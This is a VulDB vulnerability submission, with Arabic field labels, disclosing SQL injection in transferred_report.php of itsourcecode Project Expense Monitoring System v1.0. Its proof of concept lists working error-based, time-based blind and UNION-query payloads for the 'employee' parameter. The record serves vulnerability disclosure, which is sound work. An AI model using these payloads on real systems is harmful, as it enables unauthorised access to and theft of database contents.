| عنوان | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| الوصف | There are multiple SQLi injection vulnerabilities in the transferred_report.php page. Attackers can pass special SQL statements in the "$_POST['start']", "$_POST['end']", and "$_POST['employee']" parameters to obtain sensitive data in the database.
POC:
Parameter: employee (POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: employee=2' AND EXTRACTVALUE(8219,CONCAT(0x5c,0x7162627871,(SELECT (ELT(8219=8219,1))),0x717a627a71)) AND 'Priq'='Priq&search=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: employee=2' AND (SELECT 7024 FROM (SELECT(SLEEP(5)))kFSQ) AND 'IGyK'='IGyK&search=
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: employee=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627871,0x45716f47644d666d664649754b656c745a50746f714c474274445472556469537478474853514c69,0x717a627a71),NULL,NULL,NULL-- -&search= |
|---|
| المصدر | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-4.md |
|---|
| المستخدم | GUOTINGTING (UID 73614) |
|---|
| ارسال | 17/08/2024 02:16 PM (2 سنوات منذ) |
|---|
| الاعتدال | 19/08/2024 04:12 PM (2 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 275121 [itsourcecode Project Expense Monitoring System 1.0 transferred_report.php start/end/employee حقن SQL] |
|---|
| النقاط | 20 |
|---|